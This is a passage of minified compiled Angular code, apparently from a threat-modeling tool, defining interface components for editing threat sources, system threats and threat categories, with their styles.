"),u(),s(19,"\n\n      "),it(20,"div",3),oe(21,"translate"),s(22,"\n    "),u(),s(23,"\n  "),u(),s(24,"\n  "),m(25,"div",4),s(26,"\n    "),m(27,"div",5),s(28,"\n      "),m(29,"mat-list",6),he("cdkDropListDropped",function(r){return i.drop(r)}),s(30,"\n        "),m(31,"div",7),s(32),oe(33,"translate"),m(34,"button",8),oe(35,"translate"),m(36,"mat-icon"),s(37,"add"),u()(),s(38,"\n          "),m(39,"mat-menu",null,9),s(41,"\n            "),m(42,"button",10),he("click",function(){return i.AddSource()}),s(43),oe(44,"translate"),u(),s(45,"\n            "),m(46,"button",11),s(47),oe(48,"translate"),u(),s(49,"\n          "),u(),s(50,"\n          "),m(51,"mat-menu",null,12),s(53,"\n            "),ne(54,tgt,2,1,"button",13),s(55,"\n          "),u(),s(56,"\n          "),m(57,"button",14),oe(58,"translate"),m(59,"mat-icon"),s(60,"more_vert"),u()(),s(61,"\n          "),m(62,"mat-menu",null,15),s(64,"\n            "),m(65,"button",16),he("click",function(){return i.ResetNumbers()}),s(66),oe(67,"translate"),u(),s(68,"\n          "),u(),s(69,"\n        "),u(),s(70,"\n        "),ne(71,agt,15,9,"mat-list-item",17),s(72,"\n      "),u(),s(73,"\n    "),u(),s(74,"\n    "),m(75,"div",18),s(76,"\n      "),ne(77,rgt,32,13,"ng-container",19),s(78,"\n    "),u(),s(79,"\n  "),u(),s(80,"\n  "),it(81,"mat-divider"),s(82,"\n  "),m(83,"div"),s(84,"\n    "),m(85,"mat-form-field",20),s(86,"\n      "),m(87,"mat-label"),s(88),oe(89,"translate"),u(),s(90,"\n      "),m(91,"textarea",21),he("ngModelChange",function(r){return i.threatSources.Description=r}),u(),s(92,"\n    "),u(),s(93,"\n  "),u(),s(94,"\n"),u()),2&e){const n=Ti(40),r=Ti(52),c=Ti(63);C(4),V("expanded",!0),C(5),ct("\n          ",re(10,24,"general.HowTo"),"\n        "),C(4),ct("\n          ",re(14,26,"general.ThreatSources"),"\n          "),C(7),at("innerHTML",re(21,28,"pages.modeling.threatsources.howto.d"),Uc),C(9),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(3),ct("",re(33,30,"general.ThreatSources")," \n          "),C(2),at("matTooltip",re(35,32,"general.Add")),V("matMenuTriggerFor",n),C(9),ke(re(44,34,"general.New")),C(3),V("matMenuTriggerFor",r),C(1),ke(re(48,36,"general.Predefined")),C(7),V("ngForOf",i.GetPossibleThreatSources()),C(3),at("matTooltip",re(58,38,"general.More")),V("matMenuTriggerFor",c),C(8),V("disabled",i.threatSources.Sources.length<2),C(1),ke(re(67,40,"pages.modeling.threattable.resetNumbers")),C(5),V("ngForOf",i.threatSources.Sources),C(6),V("ngIf",i.selectedSource),C(11),ke(re(89,42,"general.Notes")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatSources.Description)}},dependencies:[Zi,Ri,an,Ac,Ta,gm,Dd,Ea,Sd,kd,oa,da,nn,fp,un,jr,Go,Xa,ts,is,Or,Lr,rc,pp,Xo,qo,po,Pa,il,Ec,Dc,tl,wl,xZ,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();const cgt=["nameBox"];function lgt(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(B().systemThreat.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function dgt(t,a){if(1&t&&(m(0,"mat-option",15),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B();V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function mgt(t,a){1&t&&(m(0,"mat-hint",16),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n      ",re(2,1,"messages.error.numberAlreadyExists"),"\n    "))}function ugt(t,a){if(1&t&&(m(0,"mat-option",19),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),V("value",e),C(1),ct("\n        ",e.Name,"\n      ")}}function hgt(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",5),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",17),he("valueChange",function(n){return be(e),Me(B().systemThreat.ThreatCategory=n)}),s(7,"\n      "),ne(8,ugt,2,3,"mat-option",18),s(9,"\n    "),u(),s(10,"\n  "),u()}if(2&t){const e=B();C(3),ke(re(4,3,"general.ThreatCategory")),C(3),V("value",e.systemThreat.ThreatCategory),C(2),V("ngForOf",e.GetThreatCategories())}}function fgt(t,a){if(1&t){const e=Ye();m(0,"table",20),s(1,"\n      "),m(2,"tr")(3,"td")(4,"mat-checkbox",21),he("change",function(){const r=be(e).$implicit,c=B();return Me(c.ImpactCatChanged(c.systemThreat.ImpactCats,r))}),s(5),oe(6,"translate"),u()()(),s(7,"\n    "),u()}if(2&t){const e=a.$implicit,i=B();C(4),V("checked",i.systemThreat.ImpactCats.includes(e)),C(1),ke(re(6,2,i.GetImpactCategoryName(e)))}}let pgt=(()=>{class t{constructor(e){this.dataService=e,this.showThreatCat=!1}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}GetThreatCategories(){return this.dataService.Config.GetThreatCategories()}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}ImpactCatChanged(e,i){const n=e.indexOf(i);n>=0?e.splice(n,1):e.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-system-threat"]],viewQuery:function(e,i){if(1&e&&Mi(cgt,5),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{systemThreat:"systemThreat",showThreatCat:"showThreatCat"},decls:62,vars:28,consts:[["appearance","fill",2,"width","100%"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","type","text",3,"spellcheck","ngModel","ngModelChange"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["appearance","fill",2,"width","70px","float","right","margin-left","10px"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill","class","property-form-field",4,"ngIf"],[2,"margin-top","10px","display","flex","flex-wrap","wrap"],["style","min-width: 200px;",4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"value"],[1,"alert","alert-danger",2,"color","red"],[3,"value","valueChange"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],[2,"min-width","200px"],["color","primary",3,"checked","change"]],template:function(e,i){1&e&&(m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",0),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",1,2),he("ngModelChange",function(r){return i.systemThreat.Name=r}),u(),s(10,"\n    "),ne(11,lgt,6,3,"button",3),s(12,"\n  "),u(),s(13,"\n  "),it(14,"br"),s(15,"\n  "),m(16,"mat-form-field",0),s(17,"\n    "),m(18,"mat-label"),s(19),oe(20,"translate"),u(),s(21,"\n    "),m(22,"textarea",4),he("ngModelChange",function(r){return i.systemThreat.Description=r}),u(),s(23,"\n  "),u(),s(24,"\n  "),it(25,"br"),s(26,"\n  "),m(27,"mat-form-field",5),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),m(33,"mat-select",6),he("valueChange",function(r){return i.systemThreat.Impact=r}),oe(34,"translate"),s(35,"\n      "),ne(36,dgt,3,4,"mat-option",7),s(37,"\n    "),u(),s(38,"\n  "),u(),s(39,"\n  "),m(40,"mat-form-field",8),s(41,"\n    "),m(42,"mat-label"),s(43),oe(44,"translate"),u(),s(45,"\n    "),m(46,"input",9),he("ngModelChange",function(r){return i.systemThreat.Number=r}),u(),s(47,"\n    "),ne(48,mgt,3,3,"mat-hint",10),s(49,"\n  "),u(),s(50,"\n  "),it(51,"br"),s(52,"\n  "),ne(53,hgt,11,5,"mat-form-field",11),s(54,"\n  "),it(55,"br"),s(56,"\n  "),m(57,"div",12),s(58,"\n    "),ne(59,fgt,8,4,"table",13),s(60,"\n  "),u(),s(61,"\n"),u()),2&e&&(C(5),ke(re(6,18,"general.Name")),C(3),at("matTooltip",i.systemThreat.Name),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.systemThreat.Name),C(3),V("ngIf",i.systemThreat.Name),C(8),ke(re(20,20,"properties.consequencesImpact")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.systemThreat.Description),C(8),ke(re(31,22,"properties.Impact")),C(3),at("matTooltip",re(34,24,i.GetLMHName(i.systemThreat.Impact))),V("value",i.systemThreat.Impact),C(3),V("ngForOf",i.GetLMHValues()),C(7),ke(re(44,26,"general.Number")),C(3),at("matTooltip",i.systemThreat.Number),V("ngModel",i.systemThreat.Number),C(2),V("ngIf",i.systemThreat.CheckUniqueNumber()),C(5),V("ngIf",i.showThreatCat),C(6),V("ngForOf",i.GetImpactCategories()))},dependencies:[Zi,Ri,an,Ac,Ta,gm,Dd,Ea,oa,br,da,nn,fp,un,jr,Nr,yr,Go,Xa,Pa,Xi],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}"]}),t})();const _gt=["assetsTree"],ggt=["catsTree"];function Cgt(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",21),he("click",function(){const r=be(e).$implicit;return Me(B().selectedThreat=r)}),s(1,"\n                  "),m(2,"mat-icon",22),s(3,"arrow_right"),u(),s(4,"\n                  "),m(5,"div",23),s(6),u(),s(7,"\n                  "),m(8,"div",23),s(9),oe(10,"translate"),oe(11,"translate"),u(),s(12,"\n                  "),m(13,"button",24),he("click",function(){const r=be(e).$implicit;return Me(B().DeleteThreat(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"delete"),u()(),s(17,"\n                "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.selectedThreat===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreat===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.GetLongName()),C(3),za("",re(10,9,"properties.Impact"),": ",re(11,11,i.GetLMHName(e.Impact)),""),C(4),at("matTooltip",re(14,13,"general.Delete"))}}function ygt(t,a){if(1&t&&(m(0,"div",14),s(1,"\n            "),it(2,"app-system-threat",25),s(3,"\n          "),u()),2&t){const e=B();C(2),V("systemThreat",e.selectedThreat)}}let bgt=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.locStorage=n,this._selectedThreat=null}get systemThreats(){return this.dataService.Project.GetSystemThreats()}get selectedThreat(){return this._selectedThreat}set selectedThreat(e){var i;if(this._selectedThreat=e,e&&e.ThreatCategory?(this.selectedCategoryNode=xa.FlattenNodes(this.categoryNodes).find(n=>n.data==e.ThreatCategory),this.catsTree&&(this.catsTree.checkedNodes=[this.selectedCategoryNode])):this.catsTree&&(this.catsTree.checkedNodes=null),e&&(null===(i=e.AffectedAssetObjects)||void 0===i?void 0:i.length)>0){const n=xa.FlattenNodes(this.assetNodes);this.selectedAssetNode=n.find(r=>r.data==e.AffectedAssetObjects[0]),this.assetsTree&&(this.assetsTree.checkedNodes=n.filter(r=>e.AffectedAssetObjects.includes(r.data)))}else this.assetsTree&&(this.assetsTree.checkedNodes=null)}get selectedAssetNode(){return this._selectedAssetNode}set selectedAssetNode(e){this._selectedAssetNode=e}get selectedAssetObject(){var e;return null===(e=this.selectedAssetNode)||void 0===e?void 0:e.data}get selectedCategoryNode(){return this._selectedCategoryNode}set selectedCategoryNode(e){this._selectedCategoryNode=e}get selectedCategory(){var e;return null===(e=this._selectedCategoryNode)||void 0===e?void 0:e.data}OnCheckedAssetNodesChanged(e){this.selectedThreat&&(this.selectedThreat.AffectedAssetObjects=null==e?void 0:e.map(i=>i.data))}OnCheckedCategoryChanged(e){this.selectedThreat&&(this.selectedThreat.ThreatCategory=1==(null==e?void 0:e.length)?e[0].data:null)}ngOnInit(){}ngAfterViewInit(){setTimeout(()=>{this.createAssetNodes(),this.createCategoryNodes()},10)}DeleteThreat(e){this.dataService.Project.DeleteSystemThreat(e),this.selectedThreat==e&&(this.selectedThreat=null)}AddThreat(){let e=this.dataService.Project.CreateSystemThreat(this.selectedCategory);this.selectedThreat=e,setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}ResetNumbers(){const e=this.systemThreats;for(let i=0;i<e.length;i++)e[i].Number=(i+1).toString()}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}dropWrapper(e,i){const n=this.systemThreats.indexOf(i[e.previousIndex]),r=this.systemThreats.indexOf(i[e.currentIndex]);Qs(this.systemThreats,n,r)}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_MODELING_ASSETS_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_MODELING_ASSETS_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}createAssetNodes(){const e=this.assetNodes;this.assetNodes=[];let i=this.dataService.Project,r=(d,T)=>{let k={name:()=>d.Name,canSelect:!0,canCheck:!0,checkEnabled:!0,isChecked:!1,isInactive:()=>!d.IsActive,data:d,children:[]};return null==k.isExpanded&&!d.IsActive&&(k.isExpanded=!1),d.AssociatedData.forEach(q=>{let Y=((d,T)=>({name:()=>d.Name,canSelect:!0,canCheck:!0,checkEnabled:!0,isChecked:!1,isInactive:()=>!T.IsActive,data:d,iconAlignLeft:!0,icon:"description"}))(q,d);k.children.push(Y)}),d.SubGroups.forEach(q=>{let Y=r(q,T);k.children.push(Y)}),T.push(k),k},c=[];if(i.GetProjectAssetGroup()){let d=r(i.GetProjectAssetGroup(),c);d.canSelect=d.canCheck=!1,d.icon=Zl.Icon,d.iconAlignLeft=!1,d.name=()=>"Assets",d.hasMenu=!0,this.assetNodes.push(d)}i.GetDevices().filter(d=>null!=d.AssetGroup).forEach(d=>{let T=r(d.AssetGroup,c);T.canSelect=T.canCheck=!1,T.icon=Ou.Icon,T.iconAlignLeft=!1,T.name=()=>d.Name,T.hasMenu=!0,this.assetNodes.push(T)}),i.GetMobileApps().filter(d=>null!=d.AssetGroup).forEach(d=>{let T=r(d.AssetGroup,c);T.icon=cf.Icon,T.iconAlignLeft=!1,T.name=()=>d.Name,T.hasMenu=!0,this.assetNodes.push(T)}),xa.TransferExpandedState(e,this.assetNodes),this.assetsTree.SetNavTreeData(this.assetNodes)}createCategoryNodes(){const e=this.categoryNodes;this.categoryNodes=[];let r={name:()=>"Threat Category Groups",canSelect:!1,icon:"flash_on",hasMenu:!0,children:[]};this.dataService.Config.GetThreatCategoryGroups().forEach(c=>{let d=(c=>({name:()=>c.Name,canSelect:!1,data:c,children:[]}))(c);c.ThreatCategories.forEach(T=>d.children.push((c=>({name:()=>c.Name,canSelect:!0,canCheck:!0,checkEnabled:!0,isChecked:!1,data:c}))(T))),r.children.push(d)}),this.categoryNodes.push(r),xa.TransferExpandedState(e,this.categoryNodes),this.catsTree.SetNavTreeData(this.categoryNodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-identification"]],viewQuery:function(e,i){if(1&e&&(Mi(_gt,5),Mi(ggt,5)),2&e){let n;Vt(n=Bt())&&(i.assetsTree=n.first),Vt(n=Bt())&&(i.catsTree=n.first)}},decls:98,vars:94,consts:[[2,"width","100%","height","100%"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","order"],["direction","vertical","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[2,"font-weight","bold","text-align","center"],[3,"checkEnabled","activeNode","selectedNodeChanged","checkedNodesChanged"],["assetsTree",""],[1,"disable",3,"selectedObject"],["mat-subheader","",2,"padding-bottom","0px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"float","right",3,"matMenuTriggerFor","matTooltip"],["moreMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],[2,"margin-bottom","10px",3,"size","order"],[2,"padding","10px"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],[2,"overflow","auto"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],["style","padding: 10px",4,"ngIf"],[3,"canCheckMultiple","checkEnabled","activeNode","selectedNodeChanged","checkedNodesChanged"],["catsTree",""],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[3,"systemThreat"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"as-split",1),he("dragEnd",function(r){return i.OnSplitSizeChange(r,0)}),s(3,"\n    "),m(4,"as-split-area",2),s(5,"\n      "),m(6,"as-split",3),he("dragEnd",function(r){return i.OnSplitSizeChange(r,1)}),s(7,"\n        "),m(8,"div",4),s(9),oe(10,"translate"),u(),s(11,"\n        "),m(12,"as-split-area",2),s(13,"\n          "),m(14,"app-nav-tree",5,6),he("selectedNodeChanged",function(r){return i.selectedAssetNode=r})("checkedNodesChanged",function(r){return i.OnCheckedAssetNodesChanged(r)}),u(),s(16,"\n        "),u(),s(17,"\n        "),m(18,"as-split-area",2),s(19,"\n          "),it(20,"app-properties",7),s(21,"\n        "),u(),s(22,"\n      "),u(),s(23,"\n    "),u(),s(24,"\n\n    "),m(25,"as-split-area",2),s(26,"\n      "),m(27,"as-split",3),he("dragEnd",function(r){return i.OnSplitSizeChange(r,2)}),s(28,"\n        "),m(29,"div",4),s(30),oe(31,"translate"),u(),s(32,"\n        "),m(33,"div",8),s(34),oe(35,"translate"),m(36,"button",9),he("click",function(){return i.AddThreat()}),oe(37,"translate"),m(38,"mat-icon"),s(39,"add"),u()(),s(40,"\n          "),m(41,"button",10),oe(42,"translate"),m(43,"mat-icon"),s(44,"more_vert"),u()(),s(45,"\n          "),m(46,"mat-menu",null,11),s(48,"\n            "),m(49,"button",12),he("click",function(){return i.ResetNumbers()}),s(50),oe(51,"translate"),u(),s(52,"\n          "),u(),s(53,"\n        "),u(),s(54,"\n        "),m(55,"as-split-area",13),s(56,"\n          "),m(57,"div",14),s(58,"\n            "),m(59,"mat-list",15),he("cdkDropListDropped",function(r){return i.drop(r,i.systemThreats)}),s(60,"\n              "),m(61,"div",16),s(62,"\n                "),ne(63,Cgt,18,15,"mat-list-item",17),s(64,"\n              "),u(),s(65,"\n            "),u(),s(66,"\n          "),u(),s(67,"\n        "),u(),s(68,"\n        "),m(69,"as-split-area",2),s(70,"\n          "),ne(71,ygt,4,1,"div",18),s(72,"\n        "),u(),s(73,"\n      "),u(),s(74,"\n    "),u(),s(75,"\n\n    "),m(76,"as-split-area",2),s(77,"\n      "),m(78,"as-split",3),he("dragEnd",function(r){return i.OnSplitSizeChange(r,3)}),s(79,"\n        "),m(80,"div",4),s(81),oe(82,"translate"),u(),s(83,"\n        "),m(84,"as-split-area",2),s(85,"\n          "),m(86,"app-nav-tree",19,20),he("selectedNodeChanged",function(r){return i.selectedCategoryNode=r})("checkedNodesChanged",function(r){return i.OnCheckedCategoryChanged(r)}),u(),s(88,"\n        "),u(),s(89,"\n        "),m(90,"as-split-area",2),s(91,"\n          "),it(92,"app-properties",7),s(93,"\n        "),u(),s(94,"\n      "),u(),s(95,"\n    "),u(),s(96,"\n  "),u(),s(97,"\n"),u()),2&e){const n=Ti(47);C(2),V("gutterSize",3)("restrictMove",!0),C(2),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),V("size",i.GetSplitSize(0,0,350))("order",1),C(2),V("gutterSize",3)("restrictMove",!0),C(3),ke(re(10,80,"general.Assets")),C(3),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,0,"*"))("order",1),C(2),V("checkEnabled",null!=i.selectedThreat)("activeNode",i.selectedAssetNode),C(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,1,120))("order",2),C(2),V("selectedObject",i.selectedAssetObject),C(5),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(0,1,"*"))("order",2),C(2),V("gutterSize",3)("restrictMove",!0),C(3),ke(re(31,82,"general.SystemThreats")),C(4),ct("",re(35,84,"general.Threats")," \n          "),C(2),at("matTooltip",re(37,86,"general.Add")),C(5),at("matTooltip",re(42,88,"general.More")),V("matMenuTriggerFor",n),C(8),V("disabled",i.systemThreats.length<2),C(1),ke(re(51,90,"pages.modeling.threattable.resetNumbers")),C(5),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),V("size",i.GetSplitSize(2,0,200))("order",1),C(8),V("ngForOf",i.systemThreats),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(2,1,"*"))("order",2),C(2),V("ngIf",i.selectedThreat),C(5),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(0,2,350))("order",3),C(2),V("gutterSize",3)("restrictMove",!0),C(3),ke(re(82,92,"general.ThreatCategories")),C(3),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),V("size",i.GetSplitSize(3,0,"*"))("order",1),C(2),V("canCheckMultiple",!1)("checkEnabled",null!=i.selectedThreat)("activeNode",i.selectedCategoryNode),C(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(3,1,120))("order",2),C(2),V("selectedObject",i.selectedCategory)}},dependencies:[Zi,Ri,Zh,Dp,Sd,kd,oa,da,ts,is,Or,Lr,rc,Xo,qo,po,Pa,df,TZ,pgt,Xi],styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.tabGroup[_ngcontent-%COMP%]     .mat-tab-header .mat-tab-labels 